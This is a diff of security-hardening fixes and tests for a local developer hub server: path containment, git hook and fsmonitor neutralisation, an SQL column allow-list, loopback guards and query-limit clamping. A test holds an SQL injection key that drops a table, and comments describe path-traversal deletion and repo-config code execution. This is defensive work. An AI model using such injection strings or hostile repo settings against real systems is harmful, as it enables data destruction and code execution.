         : path.join(docsDir, category, `${safeSlug}.md`)
+
+    // B4: defence-in-depth — never serve a file resolved outside docsDir, even
+    // if a future change loosens the slug/category validation above.
+    const rel = path.relative(path.resolve(docsDir), path.resolve(filePath))
+    if (rel.startsWith('..') || path.isAbsolute(rel)) {
+      res.status(404).json({ error: 'Document not found' })
+      return
+    }
 
     if (!fs.existsSync(filePath)) {
       res.status(404).json({ error: 'Document not found' })

--- a/server/explore-contract-refine.test.ts
+++ b/server/explore-contract-refine.test.ts
@@ -250,6 +250,15 @@ describe('appendContractLayerToDescription', () => {
     const out = appendContractLayerToDescription('user body\n\n\n', sampleLayer)
     expect(out.startsWith('user body\n\n---\n\n## Contract Layer')).toBe(true)
   })
+
+  it('B59: re-appending REPLACES an existing Contract Layer instead of duplicating', () => {
+    const once = appendContractLayerToDescription('user body', sampleLayer)
+    const twice = appendContractLayerToDescription(once, sampleLayer)
+    // Exactly one Contract Layer separator, and the user body is preserved once.
+    const occurrences = twice.split(CONTRACT_LAYER_SEPARATOR).length - 1
+    expect(occurrences).toBe(1)
+    expect(twice.startsWith('user body')).toBe(true)
+  })
 })
 
 describe('hasContractLayer / splitDescriptionAtContractLayer', () => {

--- a/server/explore-contract-refine.ts
+++ b/server/explore-contract-refine.ts
@@ -438,7 +438,13 @@ export function appendContractLayerToDescription(
   userBody: string,
   layer: ContractLayer,
 ): string {
-  const trimmed = userBody.replace(/\s+$/, '')
+  // B59: a Contract Refine retry must REPLACE an existing Contract Layer, not
+  // append a second one. If the body already carries a layer, strip it down to
+  // the user-authored part first so re-running is idempotent.
+  const base = hasContractLayer(userBody)
+    ? splitDescriptionAtContractLayer(userBody).user
+    : userBody
+  const trimmed = base.replace(/\s+$/, '')
   return `${trimmed}${CONTRACT_LAYER_SEPARATOR}${renderContractLayerMarkdown(layer)}`
 }
 

--- a/server/file-provenance.ts
+++ b/server/file-provenance.ts
@@ -52,6 +52,16 @@ const GIT_EXEC_ENV = (() => {
   env.GIT_TERMINAL_PROMPT = '0'
   env.GIT_ASKPASS = 'echo'
   env.GCM_INTERACTIVE = 'never'
+  // M2: these git calls run INSIDE the project repo (cwd = project.path) for every
+  // queued job, and git honors the repo's own .git/config. A hostile repo added as
+  // a project can ship `[core] fsmonitor = <script>` (or a hook) that git executes
+  // during index refresh (stash create / diff / status) → RCE on job spawn. Strip
+  // system config and override the hook-bearing keys for ALL invocations via
+  // GIT_CONFIG_PARAMETERS (same precedence as `-c`, so it wins over the repo's
+  // local config). Disabling fsmonitor only costs a perf hint; provenance reads
+  // never need hooks.
+  env.GIT_CONFIG_NOSYSTEM = '1'
+  env.GIT_CONFIG_PARAMETERS = "'core.fsmonitor=false' 'core.hooksPath=/dev/null' 'protocol.ext.allow=user'"
   return env
 })()
 

--- a/server/from-draft.test.ts
+++ b/server/from-draft.test.ts
@@ -144,6 +144,23 @@ describe('POST /tickets/from-draft', () => {
     )
   })
 
+  it('B62: a second commit for the same conversation does not insert a duplicate', async () => {
+    const app = createApp(ctx)
+    const r1 = await request(app)
+      .post('/api/projects/proj-1/tickets/from-draft')
+      .send({ title: 'A', conversationId: 'conv-dup' })
+    const r2 = await request(app)
+      .post('/api/projects/proj-1/tickets/from-draft')
+      .send({ title: 'A again', conversationId: 'conv-dup' })
+    expect(r1.status).toBe(201)
+    // Idempotent on the conversation: same ticket id, no second row.
+    expect(r2.body.ticket.id).toBe(r1.body.ticket.id)
+    const listed = await request(app).get('/api/projects/proj-1/tickets')
+    const matching = (listed.body.tickets as Array<{ origin_conversation_id?: string }>)
+      .filter((t) => t.origin_conversation_id === 'conv-dup')
+    expect(matching).toHaveLength(1)
+  })
+
   it('drops non-string labels', async () => {
     const app = createApp(ctx)
     const res = await request(app)

--- a/server/hub-analytics.test.ts
+++ b/server/hub-analytics.test.ts
@@ -124,6 +124,14 @@ describe('getHubAnalytics', () => {
     expect(result.period.label).toBe('Last 30 days')
   })
 
+  it('B42: period=custom with malformed dates does not throw (RangeError guard)', () => {
+    const registry = makeRegistry([{ id: 'p1', name: 'A', db: makeProjectDb([{ costUsd: 0.01, status: 'completed' }]) }])
+    // Garbage from/to — previously flowed into new Date(...).toISOString() → 500.
+    expect(() => getHubAnalytics(registry, { period: 'custom', from: 'not-a-date', to: 'xx' })).not.toThrow()
+    // A valid single bound is honored without throwing either.
+    expect(() => getHubAnalytics(registry, { period: 'custom', from: '2026-01-01', to: 'garbage' })).not.toThrow()
+  })
+
   it('jobsToday and costToday reflect only today\'s data', () => {
     const today = new Date().toISOString().slice(0, 10)
     const yesterday = new Date(Date.now() - 86400000).toISOString().slice(0, 10)

--- a/server/hub-analytics.ts
+++ b/server/hub-analytics.ts
@@ -45,9 +45,15 @@ function resolveBounds(opts: AnalyticsOpts): { current: DateBounds; label: strin
     return { current: { from: null, to: null }, label: 'All time' }
   }
   if (opts.period === 'custom') {
+    // B42: from/to are unvalidated query params. A malformed date flows into
+    // buildWhere's `new Date(bounds.to).toISOString()` and throws an unhandled
+    // RangeError ("Invalid time value") → 500. Drop any unparseable bound (and
+    // fall back to all-time when neither is valid) instead of crashing.
+    const validFrom = opts.from && !Number.isNaN(Date.parse(opts.from)) ? opts.from : null
+    const validTo = opts.to && !Number.isNaN(Date.parse(opts.to)) ? opts.to : null
     return {
-      current: { from: opts.from!, to: opts.to! },
-      label: `${opts.from} to ${opts.to}`,
+      current: { from: validFrom, to: validTo },
+      label: validFrom || validTo ? `${validFrom ?? '…'} to ${validTo ?? '…'}` : 'All time',
     }
   }
 

--- a/server/hub-db.test.ts
+++ b/server/hub-db.test.ts
@@ -335,6 +335,15 @@ describe('hub-db', () => {
       expect(updateAgent(db, 'missing', { status: 'busy' })).toBeUndefined()
     })
 
+    it('B72: ignores keys outside the column allow-list (no SQL injection via key)', () => {
+      addAgent(db, makeAgentOpts())
+      // A runtime caller passing an attacker-influenced key — cast past the type.
+      const malicious = { name: 'Renamed', 'status = \'x\'; DROP TABLE agents; --': 'pwn' } as unknown as Parameters<typeof updateAgent>[2]
+      expect(() => updateAgent(db, 'agent-1', malicious)).not.toThrow()
+      // The legit column applied; the agents table still exists and is queryable.
+      expect(getAgent(db, 'agent-1')?.name).toBe('Renamed')
+    })
+
     it('returns the current row when no updates given', () => {
       addAgent(db, makeAgentOpts())
       const result = updateAgent(db, 'agent-1', {})

--- a/server/hub-db.ts
+++ b/server/hub-db.ts
@@ -3,6 +3,7 @@ import path from 'path'
 import os from 'os'
 import Database from 'better-sqlite3'
 import type { DbInstance } from './db'
+import { secureDir, secureDbFile } from './util/secure-fs'
 
 // ─── Types ────────────────────────────────────────────────────────────────────
 
@@ -254,12 +255,17 @@ function applyHubMigrations(db: DbInstance): void {
 export function initHubDb(dbPath: string = getHubDbPath()): DbInstance {
   const dir = path.dirname(dbPath)
   fs.mkdirSync(dir, { recursive: true })
+  if (dbPath !== ':memory:') secureDir(dir) // H-13: owner-only ~/.specrails
 
   const db = new Database(dbPath)
   db.pragma('journal_mode = WAL')
   db.pragma('foreign_keys = ON')
 
   applyHubMigrations(db)
+
+  // H-13: hub.sqlite stores webhook HMAC secrets in plaintext — restrict it
+  // (and its WAL sidecars) to owner read/write.
+  if (dbPath !== ':memory:') secureDbFile(dbPath)
   return db
 }
 
@@ -366,12 +372,20 @@ export function addAgent(
   return db.prepare('SELECT * FROM agents WHERE id = ?').get(agent.id) as AgentRow
 }
 
+// B72: column names are interpolated into the SET clause below. TS restricts the
+// keys at compile time, but a runtime caller passing an attacker-influenced
+// object would otherwise inject SQL via the key. Gate on an explicit allow-list.
+const UPDATABLE_AGENT_COLUMNS = new Set<string>([
+  'name', 'role', 'status', 'current_job_id', 'last_heartbeat_at', 'config',
+])
+
 export function updateAgent(
   db: DbInstance,
   id: string,
   updates: Partial<Pick<AgentRow, 'name' | 'role' | 'status' | 'current_job_id' | 'last_heartbeat_at' | 'config'>>
 ): AgentRow | undefined {
-  const fields = Object.keys(updates) as (keyof typeof updates)[]
+  const fields = (Object.keys(updates) as (keyof typeof updates)[])
+    .filter((f) => UPDATABLE_AGENT_COLUMNS.has(f as string))
   if (fields.length === 0) return getAgent(db, id)
 
   const setClauses = fields.map((f) => `${f} = ?`).join(', ')

--- a/server/index.ts
+++ b/server/index.ts
@@ -15,7 +15,8 @@ import { ProjectRegistry } from './project-registry'
 import { createHubRouter } from './hub-router'
 import { createProjectRouter } from './project-router'
 import { createDocsRouter } from './docs-router'
-import { requireAuth, loadOrGenerateToken, tokenFromUpgradeRequest } from './auth'
+import { requireAuth, requireLoopback, hostValidationMiddleware, safeEqual, loadOrGenerateToken, tokenFromUpgradeRequest } from './auth'
+import { shouldDeliverToSubscriber, parseSubscribeFrame } from './ws-routing'
 import { getTerminalManager } from './terminal-manager'
 import { cleanupStaleShimDirs } from './terminal-shell-integration'
 import { isBrowserCaptureEnabled } from './feature-flags'
@@ -111,6 +112,10 @@ function removePidFile(): void {
 
 const app = express()
 
+// Host-header validation (H-08) — first barrier, anti DNS-rebinding.
+// Implementation in auth.ts (unit-tested there); index.ts is coverage-excluded.
+app.use(hostValidationMiddleware)
+
 // ─── CORS — allow only localhost origins (CRIT-02) ────────────────────────────
 
 // Tauri's desktop WebView exposes two different origin formats:
@@ -155,6 +160,11 @@ app.use(express.json({ limit: '1mb' }))
 const server = http.createServer(app)
 const wsServerOptions = {
   noServer: true,
+  // Cap inbound frame size (H-10). Shared by the main, terminal and browser WS
+  // servers. Terminal/browser input frames (keystrokes, control JSON, pastes)
+  // are tiny; 1 MB tolerates a large bracketed paste while bounding the memory
+  // a single malicious frame can force the sidecar to buffer.
+  maxPayload: 1024 * 1024,
   handleProtocols: (protocols: Set<string>) => {
     if (protocols.has('specrails-hub')) return 'specrails-hub'
 
@@ -169,7 +179,31 @@ const wsServerOptions = {
 const wss = new WebSocketServer(wsServerOptions)
 const terminalWss = new WebSocketServer(wsServerOptions)
 const browserWss = new WebSocketServer(wsServerOptions)
-const clients = new Set<WebSocket>()
+
+// ─── Per-connection WS state (H-09 / H-10) ────────────────────────────────────
+//
+// H-09: project isolation must be enforced SERVER-SIDE, not only client-side.
+// Each connection may declare the project it is interested in via a
+// `{ type: 'subscribe', projectId }` control frame; `broadcast` then routes a
+// project-scoped message only to connections subscribed to that project (plus
+// connections that have NOT declared a subscription — back-compat, they get
+// everything exactly like before). Hub-level messages (no projectId) always go
+// to everyone. The current web client does not send `subscribe`, so it keeps
+// receiving everything and the existing client-side filter stays as a redundant
+// second layer. The Mobile Gateway will subscribe per device, turning this into
+// a hard authorization boundary instead of an opt-in optimization.
+//
+// H-10: skip sending to a client whose outbound buffer is already saturated so a
+// single slow/stalled consumer can't make the sidecar buffer unboundedly.
+interface WsConnState {
+  subscribedProjectId: string | null
+}
+const clients = new Map<WebSocket, WsConnState>()
+
+// 8 MB: a healthy client drains far faster than we produce; crossing this means
+// the socket is stalled. Dropping an event is safe — clients reconcile via the
+// REST polling paths — and far better than an unbounded memory leak.
+const WS_BACKPRESSURE_LIMIT_BYTES = 8 * 1024 * 1024
 
 const TERMINAL_WS_RE = /^\/ws\/terminal\/([0-9a-f-]+)$/i
 const BROWSER_WS_RE = /^\/ws\/browser\/([0-9a-f-]+)$/i
@@ -184,17 +218,22 @@ function authorizeUpgrade(request: http.IncomingMessage): 'ok' | 'forbidden' | '
   if (!isAllowedBrowserOrigin(origin)) return 'forbidden'
 
   const provided = tokenFromUpgradeRequest(request)
-  if (!provided || provided !== loadOrGenerateToken()) return 'unauthorized'
+  if (!provided || !safeEqual(provided, loadOrGenerateToken())) return 'unauthorized'
 
   return 'ok'
 }
 
 function broadcast(msg: WsMessage): void {
   const data = JSON.stringify(msg)
-  for (const client of clients) {
-    if (client.readyState === WebSocket.OPEN) {
-      client.send(data)
-    }
+  // Project-scoped messages carry a projectId; hub-level messages do not.
+  const msgProjectId = (msg as { projectId?: string }).projectId
+  for (const [client, state] of clients) {
+    if (client.readyState !== WebSocket.OPEN) continue
+    // H-09: route project-scoped messages only to matching/undeclared subscribers.
+    if (!shouldDeliverToSubscriber(msgProjectId, state.subscribedProjectId)) continue
+    // H-10: drop for a back-pressured client instead of growing its buffer.
+    if (client.bufferedAmount > WS_BACKPRESSURE_LIMIT_BYTES) continue
+    client.send(data)
   }
 }
 
@@ -330,7 +369,10 @@ server.on('upgrade', (request, socket, head) => {
 
 // ─── Docs portal (available in all modes) ────────────────────────────────────
 
-app.use('/api/docs', createDocsRouter())
+// Loopback-only (H-04): docs are unauthenticated by design (no token needed to
+// read them), so a loopback guard is the only thing standing between them and
+// the network the day the bind changes.
+app.use('/api/docs', requireLoopback, createDocsRouter())
 
 // ─── Auth — protect all /api/* except /api/health and /api/hub/token ─────────
 // (CRIT-01) Token is served publicly so the local client can bootstrap itself.
@@ -345,7 +387,14 @@ app.get('/api/health', (_req, res) => {
   })
 })
 
-app.get('/api/hub/token', (_req, res) => {
+// Loopback-only (H-03): this is the most sensitive endpoint — it hands out the
+// master token, which grants terminals/spawn/fs/admin. It must stay public (no
+// token) so the local client can bootstrap. Two complementary guards protect it:
+// `requireLoopback` rejects a non-local PEER (matters if the bind ever changes
+// from 127.0.0.1), and the Host-header guard above rejects DNS-rebinding (where
+// the peer IS loopback — the victim's own browser — but the Host is the
+// attacker's domain). Neither alone is sufficient; together they close both.
+app.get('/api/hub/token', requireLoopback, (_req, res) => {
   res.json({ token: loadOrGenerateToken() })
 })
 
@@ -387,9 +436,14 @@ function applyWsRateLimiting(ws: WebSocket): void {
   _registry = registry
   _getProjectCount = () => registry.listContexts().length
 
-  // OTLP/JSON receiver — must be mounted before auth middleware would block it,
-  // but after CORS. Requires auth (already applied globally above via requireAuth).
-  app.use('/otlp', createTelemetryRouter(registry))
+  // OTLP/JSON receiver — INTENTIONALLY UNAUTHENTICATED (H-01/H-02). The spawned
+  // claude/codex CLIs post telemetry here with no auth header (queue-manager sets
+  // OTEL_EXPORTER_OTLP_ENDPOINT but no OTEL_EXPORTER_OTLP_HEADERS), so it cannot
+  // be put behind requireAuth. It is also NOT covered by `app.use('/api', ...)`
+  // — that middleware is path-scoped to /api, and /otlp is a sibling path (the
+  // old comment here claiming otherwise was wrong). It is protected instead by
+  // `requireLoopback` (children always connect via 127.0.0.1) + the loopback bind.
+  app.use('/otlp', requireLoopback, createTelemetryRouter(registry))
 
   // Run telemetry compaction at startup after registry is hydrated
   runCompactionForAll(registry).catch((err) => {
@@ -410,8 +464,18 @@ function applyWsRateLimiting(ws: WebSocket): void {
   })
 
   wss.on('connection', (ws: WebSocket) => {
-    clients.add(ws)
+    const state: WsConnState = { subscribedProjectId: null }
+    clients.set(ws, state)
     applyWsRateLimiting(ws)
+
+    // H-09: honor an optional `{ type: 'subscribe', projectId }` control frame so
+    // a connection can scope itself to one project's events. Anything else on the
+    // inbound channel is ignored (the main event WS is otherwise server→client).
+    ws.on('message', (data: Buffer | string) => {
+      const txt = typeof data === 'string' ? data : data.toString('utf8')
+      const frame = parseSubscribeFrame(txt)
+      if (frame.subscribe) state.subscribedProjectId = frame.projectId
+    })
 
     // Send hub state init
     const projects = registry.listContexts().map((ctx) => ctx.project)

--- a/server/plugin-manager.ts
+++ b/server/plugin-manager.ts
@@ -517,8 +517,18 @@ export class PluginManager {
       // Orphan removal: no plugin code available. Best-effort cleanup of
       // recorded installedFiles + drop the state entry. We cannot know which
       // mcpServers keys belonged to this plugin, so we leave .mcp.json alone.
+      const root = path.resolve(projectPath)
       for (const rel of entry.installedFiles ?? []) {
-        const abs = path.join(projectPath, rel)
+        const abs = path.resolve(projectPath, rel)
+        // M5: installedFiles comes from state.json, which a hostile repo can
+        // ship. Without containment, `rel` of "../../../Users/victim/x" (or an
+        // absolute path) turns orphan removal into an arbitrary-file-deletion
+        // primitive. Skip anything that resolves outside the project root.
+        const within = path.relative(root, abs)
+        if (within === '' || within.startsWith('..') || path.isAbsolute(within)) {
+          console.warn(`[plugin-manager] skipping out-of-project installedFile during orphan removal: ${rel}`)
+          continue
+        }
         try { if (fs.existsSync(abs)) fs.unlinkSync(abs) } catch { /* ignore */ }
       }
     }

--- a/server/plugins/json-mutation.ts
+++ b/server/plugins/json-mutation.ts
@@ -17,16 +17,21 @@ export async function withFileLock<T>(filePath: string, fn: () => Promise<T>): P
   const previous = _locks.get(key) ?? Promise.resolve()
   let release: () => void
   const next = new Promise<void>((resolve) => { release = resolve })
-  _locks.set(key, previous.then(() => next))
+  // B74: hold the SAME promise reference we store, so the finally can compare by
+  // identity. The old code rebuilt `previous.then(() => next)` in the finally — a
+  // fresh promise that never matched, so the cleanup never ran and `_locks` grew
+  // one entry per distinct file path forever.
+  const chained = previous.then(() => next)
+  _locks.set(key, chained)
   try {
     await previous
     return await fn()
   } finally {
     release!()
-    // Cleanup if we're still the tail of the queue.
-    if (_locks.get(key) === previous.then(() => next)) {
-      // The expression above is a fresh promise; comparing to it never matches.
-      // We use a safer cleanup based on identity below.
+    // Drop the entry only if no later caller has chained onto us (i.e. we are
+    // still the tail). Otherwise their chain depends on ours — leave it.
+    if (_locks.get(key) === chained) {
+      _locks.delete(key)
     }
   }
 }

--- a/server/project-registry.test.ts
+++ b/server/project-registry.test.ts
@@ -104,6 +104,19 @@ describe('ProjectRegistry', () => {
       registry.loadAll()
       expect(registry.listContexts()).toHaveLength(0)
     })
+
+    it('M9: a single failing project DB does not abort loading the rest', () => {
+      addProject(hubDb, { id: 'good', slug: 'good', name: 'Good', path: '/path/good' })
+      addProject(hubDb, { id: 'bad', slug: 'bad', name: 'Bad', path: '/path/bad' })
+      // Corrupt the bad project's db_path so initDb throws (ENOTDIR: /dev/null is
+      // not a directory, so mkdirSync of its parent fails).
+      hubDb.prepare('UPDATE projects SET db_path = ? WHERE id = ?').run('/dev/null/jobs.sqlite', 'bad')
+
+      expect(() => registry.loadAll()).not.toThrow()
+      expect(registry.getContext('good')).toBeDefined()
+      expect(registry.getContext('bad')).toBeUndefined()
+      expect(registry.listFailedProjects().map((f) => f.project.id)).toContain('bad')
+    })
   })
 
   // ─── addProject ────────────────────────────────────────────────────────────
@@ -181,6 +194,19 @@ describe('ProjectRegistry', () => {
       expect(qmShutdown).toHaveBeenCalled()
       expect(cmShutdown).toHaveBeenCalled()
       expect(smAbort).toHaveBeenCalledWith('p1')
+    })
+
+    it('M12: also disposes proposal/agentRefine/specLauncher before db.close()', () => {
+      registry.addProject({ id: 'p1', slug: 'my-proj', name: 'My Proj', path: '/path/to/proj' })
+      const ctx = registry.getContext('p1')!
+      const pmShutdown = vi.fn(); const arShutdown = vi.fn(); const slShutdown = vi.fn()
+      ;(ctx.proposalManager as unknown as { shutdown: unknown }).shutdown = pmShutdown
+      ;(ctx.agentRefineManager as unknown as { shutdown: unknown }).shutdown = arShutdown
+      ;(ctx.specLauncherManager as unknown as { shutdown: unknown }).shutdown = slShutdown
+      registry.removeProject('p1')
+      expect(pmShutdown).toHaveBeenCalled()
+      expect(arShutdown).toHaveBeenCalled()
+      expect(slShutdown).toHaveBeenCalled()
     })
   })
 

--- a/server/project-registry.ts
+++ b/server/project-registry.ts
@@ -64,6 +64,9 @@ export class ProjectRegistry {
   private _broadcast: (msg: WsMessage) => void
   private _webhookManager: WebhookManager
   private _hubPort: number
+  // M9: projects whose per-project DB failed to load at startup (corrupt, locked,
+  // or migration-stuck). They stay registered but have no live context.
+  private _failedProjects: Map<string, { project: ProjectRow; error: string }>
 
   constructor(broadcast: (msg: WsMessage) => void, hubDbPath?: string, hubPort?: number) {
     this._broadcast = broadcast
@@ -71,6 +74,7 @@ export class ProjectRegistry {
     this._contexts = new Map()
     this._webhookManager = new WebhookManager(this._hubDb)
     this._hubPort = hubPort ?? 4200
+    this._failedProjects = new Map()
   }
 
   get hubDb(): DbInstance {
@@ -80,8 +84,24 @@ export class ProjectRegistry {
   loadAll(): void {
     const projects = listProjects(this._hubDb)
     for (const project of projects) {
-      this._loadProjectContext(project)
+      try {
+        this._loadProjectContext(project)
+        this._failedProjects.delete(project.id)
+      } catch (err) {
+        // M9: a single corrupt / locked / migration-stuck per-project jobs.sqlite
+        // must NOT crash the whole hub at startup (previously it did, killing
+        // every other project + the UI in a restart loop). Log it, record it as
+        // failed-to-load, and keep loading the rest.
+        const msg = err instanceof Error ? err.message : String(err)
+        console.error(`[project-registry] failed to load project ${project.id} (${project.slug}): ${msg}`)
+        this._failedProjects.set(project.id, { project, error: msg })
+      }
     }
+  }
+
+  /** Projects whose per-project DB failed to load at startup (M9). */
+  listFailedProjects(): { project: ProjectRow; error: string }[] {
+    return Array.from(this._failedProjects.values())
   }
 
   addProject(opts: {
@@ -109,6 +129,14 @@ export class ProjectRegistry {
       try { ctx.queueManager.shutdown() } catch { /* ignore */ }
       try { ctx.chatManager.shutdown() } catch { /* ignore */ }
       try { ctx.setupManager.abort(id) } catch { /* ignore */ }
+      // M12: these three also spawn children that outlive removeProject. Proposal
+      // and AgentRefine write to the per-project DB in their close handlers — if
+      // not disposed before db.close() they throw on the closed connection and
+      // (no uncaughtException handler) crash the entire hub. SpecLauncher has no
+      // DB but its --dangerously-skip-permissions child keeps burning spend.
+      try { ctx.proposalManager.shutdown() } catch { /* ignore */ }
+      try { ctx.agentRefineManager.shutdown() } catch { /* ignore */ }
+      try { ctx.specLauncherManager.shutdown() } catch { /* ignore */ }
       // Tear down the embedded browser (closes pages + persistent context).
       void ctx.browserCaptureManager.shutdown().catch(() => { /* ignore */ })
       // Kill any terminal sessions belonging to this project
@@ -119,17 +147,25 @@ export class ProjectRegistry {
       // provider child, rejects queued work, and detaches the watcher — BEFORE
       // db.close() so a completing generation can't write to the closed handle.
       try { ctx.fileSummaryManager.dispose() } catch { /* ignore */ }
-      // Delete telemetry blob files for this project
-      try {
-        const telemetryDir = path.join(os.homedir(), '.specrails', 'projects', ctx.project.slug, 'telemetry')
-        if (fs.existsSync(telemetryDir)) {
-          fs.rmSync(telemetryDir, { recursive: true, force: true })
-        }
-      } catch { /* ignore — non-fatal */ }
       // Drop the hub-managed Explore Spec cwd (CLAUDE.md + symlink to project)
       try { removeExploreCwd(ctx.project.slug) } catch { /* ignore — non-fatal */ }
-      // Close the DB connection
+      // Close the DB connection BEFORE removing the project's data dir below.
       try { ctx.db.close() } catch { /* ignore */ }
+      // B54: remove the ENTIRE hub-managed data dir for this project, not just
+      // the telemetry subdir. It also holds user-mcp.json (a copy of the user's
+      // MCP config that can contain API keys), profile snapshots, codex-home, and
+      // terminal shim dirs — all secret-bearing residue that previously survived
+      // project removal. Guard on a non-empty slug so we never rm the projects/
+      // root itself.
+      try {
+        const slug = ctx.project.slug
+        if (slug && slug.trim() && !slug.includes('/') && !slug.includes('..')) {
+          const projectDir = path.join(os.homedir(), '.specrails', 'projects', slug)
+          if (fs.existsSync(projectDir)) {
+            fs.rmSync(projectDir, { recursive: true, force: true })
+          }
+        }
+      } catch { /* ignore — non-fatal */ }
       this._contexts.delete(id)
     }
     removeProjectFromHub(this._hubDb, id)
@@ -160,6 +196,9 @@ export class ProjectRegistry {
     for (const ctx of this._contexts.values()) {
       try { ctx.queueManager.shutdown() } catch { /* ignore */ }
       try { ctx.chatManager.shutdown() } catch { /* ignore */ }
+      try { ctx.proposalManager.shutdown() } catch { /* ignore */ }
+      try { ctx.agentRefineManager.shutdown() } catch { /* ignore */ }
+      try { ctx.specLauncherManager.shutdown() } catch { /* ignore */ }
       void ctx.browserCaptureManager.shutdown().catch(() => { /* ignore */ })
       // Release chokidar watchers + abort in-flight generations so a restart
       // does not leak handles/children — mirror removeProject()'s per-project teardown.

--- a/server/project-router.ts
+++ b/server/project-router.ts
@@ -592,7 +592,9 @@ export function createProjectRouter(registry: ProjectRegistry): Router {
   })
 
   router.get('/:projectId/jobs', (req: Request, res: Response) => {
-    const limit = Math.min(parseInt(String(req.query.limit ?? '50'), 10) || 50, 200)
+    // Clamp to [1, 200] (H-11): a negative limit is LIMIT -1 in SQLite, which
+    // means UNLIMITED — without the lower bound `?limit=-1` dumps the whole table.
+    const limit = Math.max(1, Math.min(parseInt(String(req.query.limit ?? '50'), 10) || 50, 200))
     const offset = parseInt(String(req.query.offset ?? '0'), 10) || 0
     const status = req.query.status as string | undefined
     const from = req.query.from as string | undefined
@@ -835,7 +837,12 @@ export function createProjectRouter(registry: ProjectRegistry): Router {
   // ─── Raw invocations table ───────────────────────────────────────────────────
   router.get('/:projectId/invocations', (req: Request, res: Response) => {
     const filters = parseSpendingFilters(req.query as Record<string, unknown>)
-    const limit = req.query.limit ? parseInt(req.query.limit as string, 10) : undefined
+    // Clamp to [1, 10000] when provided (H-11): a negative/NaN limit becomes
+    // SQLite LIMIT -1 (unlimited) and dumps the entire invocations table.
+    const rawLimit = req.query.limit ? parseInt(req.query.limit as string, 10) : undefined
+    const limit = rawLimit !== undefined && Number.isFinite(rawLimit)
+      ? Math.max(1, Math.min(rawLimit, 10_000))
+      : undefined
     const offset = req.query.offset ? parseInt(req.query.offset as string, 10) : undefined
     try {
       const result = getInvocations(ctx(req).db, ctx(req).project.id, {
@@ -2476,6 +2483,21 @@ export function createProjectRouter(registry: ProjectRegistry): Router {
           created = flipTarget
           wasFlip = true
           return
+        }
+        // B62: from-draft is idempotent only while the ticket is still a draft.
+        // After a successful commit the draft is 'todo', so the draft lookup above
+        // no longer matches and a second from-draft for the same conversation
+        // would insert a DUPLICATE ticket. If a (now non-draft) ticket already
+        // originates from this conversation, return it instead of re-inserting.
+        if (conversationId) {
+          const alreadyCommitted = Object.values(s.tickets).find(
+            (t) => t.origin_conversation_id === conversationId,
+          )
+          if (alreadyCommitted) {
+            created = alreadyCommitted
+            wasFlip = true // treat as in-place: broadcast ticket_updated, not created
+            return
+          }
         }
         // Legacy: insert new ticket
         const id = s.next_id++

--- a/server/proposal-manager.ts
+++ b/server/proposal-manager.ts
@@ -18,6 +18,7 @@ export class ProposalManager {
   private _cwd: string
   private _activeProcesses: Map<string, ChildProcess>
   private _buffers: Map<string, string>
+  private _disposed = false
 
   constructor(broadcast: (msg: WsMessage) => void, db: DbInstance, cwd: string) {
     this._broadcast = broadcast
@@ -29,6 +30,20 @@ export class ProposalManager {
 
   isActive(proposalId: string): boolean {
     return this._activeProcesses.has(proposalId)
+  }
+
+  /**
+   * Tear down before the project's DB is closed (M12). Disposes so in-flight
+   * close/error handlers skip their updateProposal DB writes (which would throw
+   * on the closed connection and crash the hub), and SIGTERMs orphaned children.
+   */
+  shutdown(): void {
+    this._disposed = true
+    for (const child of this._activeProcesses.values()) {
+      if (child.pid) { try { treeKill(child.pid, 'SIGTERM') } catch { /* ignore */ } }
+    }
+    this._activeProcesses.clear()
+    this._buffers.clear()
   }
 
   async startExploration(proposalId: string, idea: string): Promise<void> {
@@ -269,6 +284,7 @@ export class ProposalManager {
         console.error(`[ProposalManager] spawn failed for ${proposalId}: ${err.message}`)
         this._activeProcesses.delete(proposalId)
         this._buffers.delete(proposalId)
+        if (this._disposed) { resolve(); return } // M12: project removed mid-flight; DB closing
         this._broadcastError(proposalId, `Failed to launch claude: ${err.message}`)
         onError()
         resolve()
@@ -278,6 +294,7 @@ export class ProposalManager {
         const fullText = this._buffers.get(proposalId) ?? ''
         this._activeProcesses.delete(proposalId)
         this._buffers.delete(proposalId)
+        if (this._disposed) { resolve(); return } // M12: project removed mid-flight; DB closing
 
         if (code === 0) {
           onSuccess(fullText, capturedSessionId)

--- a/server/queue-manager.test.ts
+++ b/server/queue-manager.test.ts
@@ -172,6 +172,25 @@ describe('QueueManager', () => {
       expect(() => qm.cancel('no-such-id')).toThrow(JobNotFoundError)
     })
 
+    it('M20: canceling a queued job fires onJobFinished(canceled) for rail cleanup', () => {
+      vi.mocked(mockExecSync).mockReturnValue(Buffer.from('/usr/bin/claude'))
+      vi.mocked(mockSpawn).mockReturnValue(createMockChildProcess() as any)
+      vi.mocked(mockUuidV4)
+        .mockReturnValueOnce('job-running' as any)
+        .mockReturnValueOnce('job-queued' as any)
+      const onJobFinished = vi.fn()
+      const qm2 = new QueueManager(broadcast, undefined, undefined, undefined, { onJobFinished })
+
+      qm2.enqueue('/implement #1') // takes the active slot
+      qm2.enqueue('/implement #2') // stays queued
+
+      const result = qm2.cancel('job-queued')
+
+      expect(result).toBe('canceled')
+      // Previously this callback never fired for a queued cancel, leaving rails stuck.
+      expect(onJobFinished).toHaveBeenCalledWith('job-queued', 'canceled', undefined)
+    })
+
     it('on a completed job: throws JobAlreadyTerminalError', async () => {
       vi.mocked(mockExecSync).mockReturnValue(Buffer.from('/usr/bin/claude'))
       const child = createMockChildProcess()

--- a/server/queue-manager.ts
+++ b/server/queue-manager.ts
@@ -481,10 +481,28 @@ export class QueueManager {
       }
       job.status = 'canceled'
       job.finishedAt = new Date().toISOString()
+      // B47: a queued job's per-job selection entries are consumed only when the
+      // job STARTS (_resolveJobAdapter et al.). Cancelling it while queued means
+      // it never starts, so drop them here to avoid leaking map entries forever.
+      this._jobProviderSelection.delete(jobId)
+      this._jobModelSelection.delete(jobId)
+      this._jobProfileSelection.delete(jobId)
       this._skipDependents(jobId, `Parent job ${jobId} was canceled`)
       this._recomputePositions()
       this._persistJob(job)
       this._broadcastQueueState()
+      // M20: a queued cancel never reached _onJobFinished (only the running path
+      // does, via _kill→_onJobExit), so a rail-launched queued job left its
+      // railJobs entry stuck 'running' forever and dropped the job.canceled
+      // webhook + rail.job_completed broadcast. Fire the callback here too; it is
+      // exit-status-driven and idempotent on tickets.
+      if (this._onJobFinished) {
+        try {
+          this._onJobFinished(jobId, 'canceled', undefined)
+        } catch (err) {
+          console.error(`[QueueManager] onJobFinished(canceled) failed for ${jobId}: ${(err as Error).message}`)
+        }
+      }
       return 'canceled'
     }
 
@@ -689,8 +707,22 @@ export class QueueManager {
     if (readyIndex === -1) return
 
